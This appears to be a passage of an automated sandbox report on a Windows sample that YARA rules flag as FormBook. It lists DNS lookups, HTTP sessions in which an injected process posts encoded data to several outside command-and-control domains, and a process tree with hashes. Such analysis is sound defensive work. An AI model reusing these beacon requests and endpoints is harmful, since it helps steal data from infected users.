Jan 11, 2025 04:06:59.276139021 CET | 192.168.2.7 | 1.1.1.1 | 0xf866 | Standard query (0) | www.aktmarket.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:07:12.431974888 CET | 192.168.2.7 | 1.1.1.1 | 0x192a | Standard query (0) | www.golivenow.live | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:07:26.526067019 CET | 192.168.2.7 | 1.1.1.1 | 0x4e00 | Standard query (0) | www.iglpg.online | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 04:06:30.244719028 CET | 1.1.1.1 | 192.168.2.7 | 0xaad0 | No error (0) | www.christinascuties.net | | 74.208.236.156 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:06:46.123529911 CET | 1.1.1.1 | 192.168.2.7 | 0x9f8d | No error (0) | www.techmiseajour.net | techmiseajour.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 04:06:46.123529911 CET | 1.1.1.1 | 192.168.2.7 | 0x9f8d | No error (0) | techmiseajour.net | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:06:59.287982941 CET | 1.1.1.1 | 192.168.2.7 | 0xf866 | No error (0) | www.aktmarket.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:06:59.287982941 CET | 1.1.1.1 | 192.168.2.7 | 0xf866 | No error (0) | www.aktmarket.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:07:12.550628901 CET | 1.1.1.1 | 192.168.2.7 | 0x192a | No error (0) | www.golivenow.live | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:07:26.537486076 CET | 1.1.1.1 | 192.168.2.7 | 0x4e00 | No error (0) | www.iglpg.online | iglpg.online | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 04:07:26.537486076 CET | 1.1.1.1 | 192.168.2.7 | 0x4e00 | No error (0) | iglpg.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:07:26.537486076 CET | 1.1.1.1 | 192.168.2.7 | 0x4e00 | No error (0) | iglpg.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                          • www.christinascuties.net
                                                          • www.techmiseajour.net
                                                          • www.aktmarket.xyz
                                                          • www.golivenow.live
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 51320 | 74.208.236.156 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:06:30.266010046 CET | 439 | OUT | GET /raea/?-pztsZ6x=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp3E/jI7y5iYAByXvyTWq6cDZMSDvdA4QMsGyTH+1ZevuClMSDErjQvhDp&jHc=_xZhxrExRJpXy4 HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.christinascuties.net
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Jan 11, 2025 04:06:30.780997038 CET | 770 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Content-Length: 626
                                                          Connection: close
                                                          Date: Sat, 11 Jan 2025 03:06:30 GMT
                                                          Server: Apache
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 51321 | 84.32.84.32 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:06:46.156256914 CET | 704 | OUT | POST /jytl/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.techmiseajour.net
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 221
                                                          Origin: http://www.techmiseajour.net
                                                          Referer: http://www.techmiseajour.net/jytl/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Ascii: -pztsZ6x=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUiWOZ1ZWkHtF82rMsS22bTbxQhshiKCEXTisrJAfLr8qombITng==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 51322 | 84.32.84.32 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:06:48.700236082 CET | 724 | OUT | POST /jytl/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.techmiseajour.net
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 241
                                                          Origin: http://www.techmiseajour.net
                                                          Referer: http://www.techmiseajour.net/jytl/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Ascii: -pztsZ6x=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKJrluFUdkZiRjozEirq0LPCrJpXxRjlV+8Ue2aN8lZT/UcxIcI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 51323 | 84.32.84.32 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:06:51.249531031 CET | 1737 | OUT | POST /jytl/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.techmiseajour.net
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1253
                                                          Origin: http://www.techmiseajour.net
                                                          Referer: http://www.techmiseajour.net/jytl/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 51324 | 84.32.84.32 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:06:53.790595055 CET | 436 | OUT | GET /jytl/?-pztsZ6x=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4HtQbsAC9MkV/G3NnAml8OZJy5NH6433LttETR9jiekKwjvXYHWThJEDI&jHc=_xZhxrExRJpXy4 HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.techmiseajour.net
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Jan 11, 2025 04:06:54.258259058 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Sat, 11 Jan 2025 03:06:54 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 9973
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Server: hcdn
                                                          alt-svc: h3=":443"; ma=86400
                                                          x-hcdn-request-id: e7cef389a12f820e905991c66549f7fa-bos-edge1
                                                          Expires: Sat, 11 Jan 2025 03:06:53 GMT
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 51325 | 13.248.169.48 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:06:59.310039043 CET | 692 | OUT | POST /wb7v/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.aktmarket.xyz
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 221
                                                          Origin: http://www.aktmarket.xyz
                                                          Referer: http://www.aktmarket.xyz/wb7v/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Ascii: -pztsZ6x=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3psu4JltCGTZuUqXIYom4OIdP33iWik2VFBofH7mDiisWBuxrAQ==
Jan 11, 2025 04:06:59.772159100 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 51326 | 13.248.169.48 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:07:01.857254028 CET | 712 | OUT | POST /wb7v/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.aktmarket.xyz
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 241
                                                          Origin: http://www.aktmarket.xyz
                                                          Referer: http://www.aktmarket.xyz/wb7v/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Ascii: -pztsZ6x=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZl0z1Gg1CrgHAsHKZSi9VJ8M8QvWoaoSoZ+XIJHjHxIrC7v3u4=
                                                          Jan 11, 2025 04:07:02.302726984 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.7 | 51327 | 13.248.169.48 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 04:07:04.411258936 CET | 1725 | OUT | POST /wb7v/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.aktmarket.xyz
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1253
                                                          Origin: http://www.aktmarket.xyz
                                                          Referer: http://www.aktmarket.xyz/wb7v/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.7 | 51328 | 13.248.169.48 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 04:07:06.946891069 CET | 432 | OUT | GET /wb7v/?jHc=_xZhxrExRJpXy4&-pztsZ6x=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNMegpUt1fue+iLHYlvG76twMotNjNvt0StR0O0bh5nOABYSyZ3tCxaOT0 HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.aktmarket.xyz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Jan 11, 2025 04:07:07.422849894 CET | 404 | IN | HTTP/1.1 200 OK
                                                          content-type: text/html
                                                          date: Sat, 11 Jan 2025 03:07:07 GMT
                                                          content-length: 283
                                                          connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jHc=_xZhxrExRJpXy4&-pztsZ6x=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNMegpUt1fue+iLHYlvG76twMotNjNvt0StR0O0bh5nOABYSyZ3tCxaOT0"}</script></head></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.7 | 51329 | 66.29.149.46 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 04:07:12.572743893 CET | 695 | OUT | POST /r2k9/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.golivenow.live
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 221
                                                          Origin: http://www.golivenow.live
                                                          Referer: http://www.golivenow.live/r2k9/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Ascii: -pztsZ6x=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStPun4oUvCzebKj4lIBbO8nkjzLhoqBW0NtmP6uxqnIe5po8JaGA==
                                                          Jan 11, 2025 04:07:13.189049959 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 03:07:13 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.7 | 51330 | 66.29.149.46 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 04:07:15.128312111 CET | 715 | OUT | POST /r2k9/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.golivenow.live
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 241
                                                          Origin: http://www.golivenow.live
                                                          Referer: http://www.golivenow.live/r2k9/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Ascii: -pztsZ6x=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51bIPjMcWwp4vnLijTeGXpcDluoeQzXwRoQ9PFjrozqBxS1CQGs=
                                                          Jan 11, 2025 04:07:15.753412962 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 03:07:15 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.7 | 51331 | 66.29.149.46 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 04:07:17.670074940 CET | 1728 | OUT | POST /r2k9/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.golivenow.live
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1253
                                                          Origin: http://www.golivenow.live
                                                          Referer: http://www.golivenow.live/r2k9/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Jan 11, 2025 04:07:18.269484043 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 03:07:18 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.7 | 51332 | 66.29.149.46 | 80 | 6208 | C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 04:07:20.219361067 CET | 433 | OUT | GET /r2k9/?-pztsZ6x=R82aEe+RY/7ruopLPiKRJqOVryxP2PLUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z4XbG+3l1So+gPg3dZW44XObjN+WC+Ppk5idK3Qy4ode17oimlo20fhs9&jHc=_xZhxrExRJpXy4 HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.golivenow.live
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Jan 11, 2025 04:07:20.828409910 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 03:07:20 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Target ID:0
                                                          Start time:22:05:20
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\PGK60fNNCZ.exe"
                                                          Imagebase:0x430000
                                                          File size:763'904 bytes
                                                          MD5 hash:BE729FE26E81CB5D5AB76FA5A235ACCB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:22:05:23
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\PGK60fNNCZ.exe"
                                                          Imagebase:0x370000
                                                          File size:763'904 bytes
                                                          MD5 hash:BE729FE26E81CB5D5AB76FA5A235ACCB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:22:05:23
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\PGK60fNNCZ.exe"
                                                          Imagebase:0x430000
                                                          File size:763'904 bytes
                                                          MD5 hash:BE729FE26E81CB5D5AB76FA5A235ACCB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:22:05:23
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\PGK60fNNCZ.exe"
                                                          Imagebase:0x4b0000
                                                          File size:763'904 bytes
                                                          MD5 hash:BE729FE26E81CB5D5AB76FA5A235ACCB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:23:56:26
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe"
                                                          Imagebase:0x7f0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:9
                                                          Start time:23:56:27
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\cacls.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                          Imagebase:0xc20000
                                                          File size:27'648 bytes
                                                          MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:12
                                                          Start time:23:56:40
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe"
                                                          Imagebase:0x7f0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
